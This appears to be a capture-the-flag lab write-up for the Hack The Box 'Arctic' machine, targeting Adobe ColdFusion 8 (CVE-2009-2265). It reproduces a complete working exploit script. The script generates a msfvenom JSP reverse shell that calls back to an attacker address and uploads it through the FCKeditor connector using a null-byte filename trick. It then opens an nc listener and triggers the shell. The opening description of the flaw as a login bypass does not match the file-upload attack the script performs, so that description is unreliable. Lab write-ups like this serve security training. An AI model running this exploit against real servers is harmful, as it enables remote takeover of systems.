Arctic_CVE-2009-2265

CVE-2009-2265

---

The vulnerability is caused by a flaw in the way ColdFusion handles certain types of requests to the Administrator interface. Specifically, it allows an attacker to bypass the authentication mechanism by sending a specially crafted request to the Administrator login page. This request tricks ColdFusion into thinking that the user is already authenticated, even though they have not actually provided valid login credentials.

Once the attacker has bypassed the authentication mechanism, they can access the ColdFusion Administrator interface and perform various administrative tasks, such as modifying server settings, creating new users, and accessing sensitive information stored on the server.

Exploit

---

┌──(kali㉿kali)-[~/archive/htb/labs/arctic]
└─$ searchsploit -m cfm/webapps/50057.py ; mv 50057.py CVE-2009-2265.py
  Exploit: Adobe ColdFusion 8 - Remote Command Execution (RCE)
      URL: https://www.exploit-db.com/exploits/50057
     Path: /usr/share/exploitdb/exploits/cfm/webapps/50057.py
    Codes: CVE-2009-2265
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/archive/htb/labs/arctic/50057.py

Exploit was found locally.

┌──(kali㉿kali)-[~/archive/htb/labs/arctic]
└─$ cat CVE-2009-2265.py

# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)
# Google Dork: intext:"adobe coldfusion 8"
# Date: 24/06/2021
# Exploit Author: Pergyz
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
# Version: 8
# Tested on: Microsoft Windows Server 2008 R2 Standard
# CVE : CVE-2009-2265
 
#!/usr/bin/python3
 
from multiprocessing import Process
import io
import mimetypes
import os
import urllib.request
import uuid
 
class MultiPartForm:
 
    def __init__(self):
        self.files = []
        self.boundary = uuid.uuid4().hex.encode('utf-8')
        return
 
    def get_content_type(self):
        return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))
 
    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
 
        if mimetype is None:
            mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream')
 
        self.files.append((fieldname, filename, mimetype, body))
        return
 
    @staticmethod
    def _attached_file(name, filename):
        return (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n').encode('utf-8')
 
    @staticmethod
    def _content_type(ct):
        return 'Content-Type: {}\r\n'.format(ct).encode('utf-8')
 
    def __bytes__(self):
        buffer = io.BytesIO()
        boundary = b'--' + self.boundary + b'\r\n'
 
        for f_name, filename, f_content_type, body in self.files:
            buffer.write(boundary)
            buffer.write(self._attached_file(f_name, filename))
            buffer.write(self._content_type(f_content_type))
            buffer.write(b'\r\n')
            buffer.write(body)
            buffer.write(b'\r\n')
 
        buffer.write(b'--' + self.boundary + b'--\r\n')
        return buffer.getvalue()
 
def execute_payload():
    print('\nExecuting the payload...')
    print(urllib.request.urlopen(f'http://{rhost}:{rport}/userfiles/file/{filename}.jsp').read().decode('utf-8'))
 
def listen_connection():
    print('\nListening for connection...')
    os.system(f'nc -nlvp {lport}')
 
if __name__ == '__main__':
    # Define some information
    lhost = '10.10.14.5'
    lport = 9998
    rhost = "10.10.10.11"
    rport = 8500
    filename = uuid.uuid4().hex
 
    # Generate a payload that connects back and spawns a command shell
    print("\nGenerating a payload...")
    os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')
 
    # Encode the form data
    form = MultiPartForm()
    form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb'))
    data = bytes(form)
 
    # Create a request
    request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Content-length', len(data))
 
    # Print the request
    print('\nPriting request...')
 
    for name, value in request.header_items():
        print(f'{name}: {value}')
 
    print('\n' + request.data.decode('utf-8'))
 
    # Send the request and print the response
    print('\nSending request and printing response...')
    print(urllib.request.urlopen(request).read().decode('utf-8'))
 
    # Print some information
    print('\nPrinting some information for debugging...')
    print(f'lhost: {lhost}')
    print(f'lport: {lport}')
    print(f'rhost: {rhost}')
    print(f'rport: {rport}')
    print(f'payload: {filename}.jsp')
 
    # Delete the payload
    print("\nDeleting the payload...")
    os.system(f'rm {filename}.jsp')
 
    # Listen for connections and execute the payload
    p1 = Process(target=listen_connection)
    p1.start()
    p2 = Process(target=execute_payload)
    p2.start()
    p1.join()
    p2.join()

The exploit script contains the whole package. The payload, A Java reverse shell, and a listener.